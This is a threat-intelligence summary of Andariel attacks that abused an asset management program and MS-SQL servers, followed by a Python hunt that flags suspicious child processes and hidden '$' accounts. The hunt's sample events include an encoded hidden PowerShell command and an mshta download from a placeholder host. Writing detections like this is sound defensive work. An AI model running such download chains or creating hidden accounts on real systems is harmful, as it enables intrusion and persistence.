Detection of attack activity abusing an asset management program (Andariel Group)
2023-11-10 • Ahnlab • Detection of attack circumstances abusing asset management program (Andariel Group)
ASEC reports that Andariel, described as linked to or subordinate to Lazarus, abused a Korean asset management program and poorly managed MS-SQL servers to deploy TigerRat, NukeSped variants, Black RAT, Lilith RAT, and a Go downloader. The observed targets include Korean telecommunications and semiconductor manufacturing environments, matching prior Andariel targeting. The asset management program was abused to launch PowerShell and mshta download chains, while the MS-SQL activity used PrintSpoofer for privilege escalation and installed backdoors. The malware set up persistence through scheduled tasks, collected host and credential information, used tools such as CredentialsFileView and Network Password Recovery, and created a hidden "black$" account to support RDP access and lateral movement.
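As an added example (not code from the ASEC report), the following Python hunt runs over constructed process-creation and account-creation events and flags the two behaviours summarised above: download-capable LOLBins (PowerShell, mshta) or a shell spawned by the asset management agent or the MS-SQL service, and creation of a local account whose name ends in "$" (hidden from plain `net user` listings, like the "black$" account). The process name assetmgr_agent.exe and the log format are assumed placeholders.

```python
import re
from typing import Dict, List

# Constructed sample events (not from the report), in a simplified key=value form.
SAMPLE_EVENTS = [
    'event=process_create parent=assetmgr_agent.exe image=powershell.exe cmdline="powershell -nop -w hidden -enc AAAA"',
    'event=process_create parent=assetmgr_agent.exe image=mshta.exe cmdline="mshta http://placeholder.invalid/a.hta"',
    'event=process_create parent=explorer.exe image=notepad.exe cmdline="notepad.exe"',
    'event=account_create account=black$ subject=Administrator',
    'event=account_create account=svc_backup subject=Administrator',
    'event=process_create parent=sqlservr.exe image=cmd.exe cmdline="cmd /c whoami"',
]

# Download-capable LOLBins the report says the asset management program launched.
DOWNLOAD_LOLBINS = {"powershell.exe", "mshta.exe"}
# Parents that should not normally spawn shells or LOLBins (agent name is a placeholder).
SUSPICIOUS_PARENTS = {"assetmgr_agent.exe", "sqlservr.exe"}

KV_RE = re.compile(r'(\w+)=("[^"]*"|\S+)')


def parse_event(line: str) -> Dict[str, str]:
    """Parse one key=value log line; quoted values may contain spaces."""
    return {k: v.strip('"') for k, v in KV_RE.findall(line)}


def hunt(lines: List[str]) -> List[str]:
    """Return one finding string per event matching the report's TTPs."""
    findings = []
    for line in lines:
        ev = parse_event(line)
        kind = ev.get("event")
        if kind == "process_create":
            parent = ev.get("parent", "").lower()
            image = ev.get("image", "").lower()
            if parent in SUSPICIOUS_PARENTS and (image in DOWNLOAD_LOLBINS or image == "cmd.exe"):
                findings.append(f"suspicious child {image} of {parent}: {ev.get('cmdline', '')}")
        elif kind == "account_create":
            name = ev.get("account", "")
            if name.endswith("$"):  # "$"-suffixed names are hidden from net user
                findings.append(f"hidden-style account created: {name}")
    return findings


if __name__ == "__main__":
    for f in hunt(SAMPLE_EVENTS):
        print(f)
```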
Indicators of Compromise